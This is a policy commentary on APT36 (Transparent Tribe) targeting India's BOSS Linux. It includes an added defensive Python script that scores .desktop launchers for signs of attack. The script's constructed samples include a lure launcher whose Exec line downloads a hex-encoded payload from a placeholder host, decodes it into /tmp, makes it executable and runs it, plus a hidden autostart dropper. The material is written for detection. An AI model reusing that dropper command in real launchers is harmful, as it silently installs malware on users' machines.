APT36’s targeting of India’s BOSS Linux system reveals the expanding scope of Pakistan’s cyber-espionage operations, underscoring the urgent need for India to strengthen its digital defence architecture.
Following Operation Sindoor, the Pakistan-linked threat group APT36, also known as Transparent Tribe, has targeted India’s Bharat Operating System Solutions (BOSS) Linux[1] operating system numerous times. This marks a significant departure from the group’s usual playbook, which has been centred on Windows-centric malware and spear-phishing lures. By expanding its reach to compromise BOSS Linux, a system widely adopted by Indian government entities, APT36 is signalling not merely a technical upgrade but a deliberate escalation on the cyber-espionage front in the India-Pakistan rivalry.
APT36’s targeting of BOSS Linux indicates a calculated attempt to undermine confidence in this indigenous platform. A successful breach not only grants access to sensitive communications and classified data but also erodes institutional faith in self-reliant technological ecosystems. This outcome serves Pakistan’s interests on multiple levels: tactically, by harvesting intelligence; and strategically, by discrediting India’s efforts at digital autonomy.
The discovery of this campaign underscores an uncomfortable reality: Pakistan-based cyber actors, often operating under the aegis of state agencies or enjoying tacit state protection, are evolving their capabilities beyond low-level phishing attacks into strategically targeted, cross-platform espionage operations. This trend holds profound implications for India’s national security, not least because it compromises trust in indigenous technologies developed as alternatives to foreign software ecosystems.
The latest intrusion by APT36 begins with a familiar vector: spear-phishing emails. Camouflaged as official government correspondence, these emails deliver compressed archives containing malicious .desktop launcher files. Unlike traditional Windows executables, these shortcuts are designed explicitly for Linux desktop environments and are crafted to resemble innocuous PDF files.
When opened, the .desktop file runs the chain of commands embedded in its Exec field. Utilities such as curl and xxd fetch a hex-encoded payload from attacker-controlled infrastructure, decode it, and write it to a temporary directory. Once granted execute permission, the payload runs silently in the background while the user is distracted by a decoy PDF opened in parallel.
Forensic evidence suggests a Pakistan state-backed effort, given the substantial resources expended on developing BOSS Linux-specific attack chains and maintaining redundant infrastructure. The campaign is more than an opportunistic strike; it is an assault on India’s technological sovereignty.
Persistence is achieved by ensuring that the malware relaunches upon every login. Its communications are funnelled to command-and-control (C2) nodes and the newly registered domain, both of which reflect a carefully coordinated campaign.
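The two paragraphs above describe the lure (a .desktop launcher whose Exec field downloads, decodes, drops and executes a payload while opening a decoy document) and the persistence step (relaunch at every login). The script below is an added example of how a defender could triage launcher files for exactly those traits; it is not code from the article or from any vendor report it draws on. All sample files are constructed, the domain c2.example.invalid is a placeholder, and the XDG autostart directories are an assumption about what "relaunches upon every login" means on a Linux desktop, since the article does not name the mechanism.

```python
"""Triage heuristics for Linux .desktop launchers (added example, constructed data).

Assumptions not taken from the article: the autostart directories below as the
login-launch location, the placeholder domain c2.example.invalid, and the sample
launchers. The indicators are generic analyst heuristics, not campaign signatures.
"""
import re
from configparser import ConfigParser, Error as ConfigError
from pathlib import Path

DOWNLOAD = re.compile(r"\b(curl|wget)\b")          # fetches remote content
DECODE = re.compile(r"\b(xxd|base64)\b")           # turns a hex/base64 blob back into a binary
CHMOD_EXEC = re.compile(r"\bchmod\s+(\+x|[ugoa]+\+x|[0-7]{3,4})")
DOC_MASQ = re.compile(r"\.(pdf|docx?|xlsx?|pptx?)\.desktop$", re.I)
TMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
AUTOSTART_DIRS = ("/.config/autostart/", "/etc/xdg/autostart/")  # assumed login-launch locations


def parse_desktop(text):
    """Return the [Desktop Entry] group of a .desktop file as a dict ({} if unparsable)."""
    cp = ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.optionxform = str  # keys such as Exec and NoDisplay are case-sensitive in the spec
    try:
        cp.read_string(text)
    except ConfigError:
        return {}
    return dict(cp["Desktop Entry"]) if "Desktop Entry" in cp else {}


def score_desktop(filename, text):
    """List the indicators found in one launcher; an empty list means nothing odd."""
    entry = parse_desktop(text)
    exec_line = entry.get("Exec", "")
    reasons = []
    if DOC_MASQ.search(filename):
        reasons.append("double extension: launcher masquerading as a document")
    if DOWNLOAD.search(exec_line):
        reasons.append("Exec fetches remote content")
    if DECODE.search(exec_line):
        reasons.append("Exec decodes an encoded blob (hex/base64)")
    if any(d in exec_line for d in TMP_DIRS):
        reasons.append("Exec writes to or runs from a world-writable temp directory")
    if CHMOD_EXEC.search(exec_line):
        reasons.append("Exec grants execute permission to a dropped file")
    if "xdg-open" in exec_line and reasons:
        reasons.append("opens a document in parallel with other commands (decoy pattern)")
    return reasons


def triage(files):
    """files maps path -> launcher text (a live host would glob the XDG data and
    autostart directories instead). Returns (path, reasons) sorted by indicator count.
    Persistence context is only reported for launchers that already look suspicious,
    so ordinary autostart entries are not flagged on location alone."""
    findings = []
    for path, text in files.items():
        reasons = score_desktop(Path(path).name, text)
        if reasons and any(d in path for d in AUTOSTART_DIRS):
            reasons.append("lives in an autostart directory: runs at every login")
            if parse_desktop(text).get("NoDisplay", "false").lower() == "true":
                reasons.append("NoDisplay=true hides it from the startup-applications UI")
        if reasons:
            findings.append((path, reasons))
    return sorted(findings, key=lambda f: len(f[1]), reverse=True)


# --- constructed samples (not real files from the campaign) ---------------------
BENIGN_LAUNCHER = """[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
Icon=accessories-text-editor
Terminal=false
"""

# Mirrors the chain the article describes; placeholder domain, constructed paths.
LURE_LAUNCHER = """[Desktop Entry]
Type=Application
Name=Meeting_Notice.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -s http://c2.example.invalid/p.hex | xxd -r -p > /tmp/.svc; chmod +x /tmp/.svc; /tmp/.svc & xdg-open /tmp/notice.pdf"
"""

AUTOSTART_LAUNCHER = """[Desktop Entry]
Type=Application
Name=svc
Exec=/tmp/.svc
NoDisplay=true
"""

BENIGN_AUTOSTART = """[Desktop Entry]
Type=Application
Name=Example Agent
Exec=/usr/lib/example-agent
"""

SAMPLE_FILES = {
    "/home/analyst/Downloads/Meeting_Notice.pdf.desktop": LURE_LAUNCHER,
    "/home/analyst/.config/autostart/.svc.desktop": AUTOSTART_LAUNCHER,
    "/home/analyst/.config/autostart/agent.desktop": BENIGN_AUTOSTART,
    "/usr/share/applications/gedit.desktop": BENIGN_LAUNCHER,
}

if __name__ == "__main__":
    for path, reasons in triage(SAMPLE_FILES):
        print(f"{path}  [{len(reasons)} indicators]")
        for reason in reasons:
            print(f"   - {reason}")
```

On the constructed samples the lure launcher collects six indicators and the autostart dropper three, while the two benign entries produce none. The point of scoring several weak traits together is that none of them is conclusive on its own: curl in an Exec line or a launcher in an autostart directory is normal, but a document-named launcher that downloads, decodes, chmods and runs something out of /tmp while opening a PDF is the pattern the article describes.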
Pakistan-supported hacking groups collectively serve Islamabad’s strategic agenda. APT36, also known as Transparent Tribe, is primarily focused on cyber espionage against the Indian government, targeting Indian defence personnel, diplomatic missions, and critical infrastructure. Its preferred tactics have included malware-laden documents, watering-hole attacks, and social engineering through fake recruitment portals. There have been reports of a link between other APT-based groups, such as SideCopy, SideWinder, and Transparent Tribe. These groups often share infrastructure, malware families, or operational overlaps, suggesting either coordination or common direction by Pakistan’s intelligence services, particularly the Inter-Services Intelligence (ISI).
While India remains the principal target, Pakistan-based hackers have extended their reach internationally, either independently or in collaboration with other state-linked actors. Several examples illustrate this global dimension. For instance, in 2021, soon after the Taliban takeover of Afghanistan, Pakistan-linked hackers engaged in a campaign against Afghan government and civil society networks, consolidating Islamabad’s influence and monitoring rival factions. Similarly, there have been reported overlaps between Pakistani hacker groups and campaigns affecting Gulf states, particularly those hosting large Indian diasporas. Espionage here has dual value: monitoring Indian activities abroad and gaining leverage with Gulf governments. Security firms have observed occasional alignment between Pakistani actors and broader anti-Western cyber campaigns, some with tacit Chinese or Iranian involvement. These collaborations may be opportunistic rather than formal. Still, they indicate a willingness on the part of Pakistani hackers to position themselves as part of the global anti-Western cyber-espionage ecosystem.
As India promotes platforms like BOSS Linux, there should be a mandatory and more rigorous security certification framework led by CERT-In, DRDO, and the National Informatics Centre (NIC).
In essence, Pakistan has fostered an environment where state priorities, cybercrime networks, and ideological motivations blur into a hybrid threat matrix. The state benefits from plausible deniability while reaping the intelligence dividends of global cyber operations.
Over the past decade, Pakistan-based hackers have evolved from low-level disruptors into sophisticated cyber-espionage actors. Between 2010 and 2014, their operations primarily involved website defacements, online propaganda, and basic phishing attacks aimed at embarrassing Indian institutions. From 2015 to 2019, groups like APT36 matured technically, shifting toward credential theft, malware infiltration, and sustained surveillance of India’s defence and diplomatic networks. The period 2020 to 2024 marked a cross-platform expansion, with Pakistan-linked actors developing Android malware targeting Indian military personnel through fake applications and deploying advanced Windows-based trojans with layered obfuscation. By 2025, the focus had moved to Linux-specific targeting, particularly against India’s indigenous BOSS Linux system. This development signals dedicated research capacity and a state-backed commitment to penetrating critical digital infrastructure. Such a trajectory reflects Pakistan’s transition from a nuisance-level cyber actor to a structured, strategic, and offensive one that directly threatens India’s technological and national security landscape.
The attack on India’s BOSS Linux should not be viewed as an isolated cyber incident but as part of a broader transnational security challenge unfolding in the grey zone of hybrid warfare. Pakistan’s strategy has long employed a blend of conventional, sub-conventional, and informational tools to weaken India’s security architecture, and cyber operations now represent its newest frontier.
Given that India has one of the most advanced IT ecosystems and that private Indian cybersecurity companies have been able to track cyberattacks — particularly those targeting defence technology, finance, and telecommunications — more swiftly, there is a need for greater synergy between private and government agencies.
By targeting BOSS Linux, an indigenous operating system central to India’s drive for technological self-reliance, Pakistan-linked actors are staging an attack on India’s digital sovereignty. Beyond espionage, such operations enable adversaries to penetrate government systems on a large scale, intercepting sensitive policy, defence, and diplomatic communications that could influence decision-making during crises.
In times of tension or limited conflict, pre-positioned malware could be activated to paralyse communication channels, interfere with logistics, or disrupt essential services, achieving strategic disruption without crossing the threshold of open war. In this sense, the targeting of BOSS Linux is symbolic of how the digital domain has become an extension of the battlefield, where state and proxy actors engage India in an unceasing contest for advantage in the grey zone.
India must adopt a multi-layered, adaptive defence posture to counter the evolving threat landscape.
The exploitation of BOSS Linux by APT36 is not merely a technical episode, but a strategic signal: Pakistan’s cyber-espionage machinery is adapting to India’s countermeasures and targeting indigenous solutions once thought secure. Transparent Tribe’s evolution from Windows payloads to Linux-specific malware reveals an expanding toolkit designed to penetrate India’s technological backbone.
The government and military must upgrade the Defence Cyber Agency to a Command-level body and formulate a holistic mechanism for securing national cyberspace.
Pakistan’s broader cyber ecosystem, supported by state patronage and interwoven with global hacker networks, poses a persistent threat to India’s national security. For New Delhi, the challenge is not only to neutralise these campaigns but also to reinforce trust in indigenous systems and project resilience.
Cyber warfare, unlike conventional conflict, unfolds silently yet relentlessly. In this theatre, the battle is as much about perceptions of security as it is about technical breaches. India’s defensive strategy must therefore be holistic, encompassing technological, institutional, and diplomatic aspects, to ensure that its sovereignty in cyberspace remains uncompromised.
Soumya Awasthi is a Fellow with the Centre for Security, Strategy and Technology at the Observer Research Foundation.
[1] BOSS Linux is a free, Indian operating system based on Linux, created by the government to promote open-source software and offer a secure system tailored for India's needs. It supports Indian languages and is used in government and the defense sector for its stability and security features, offering variants for desktop, server, and secure enterprise use.
The views expressed above belong to the author(s).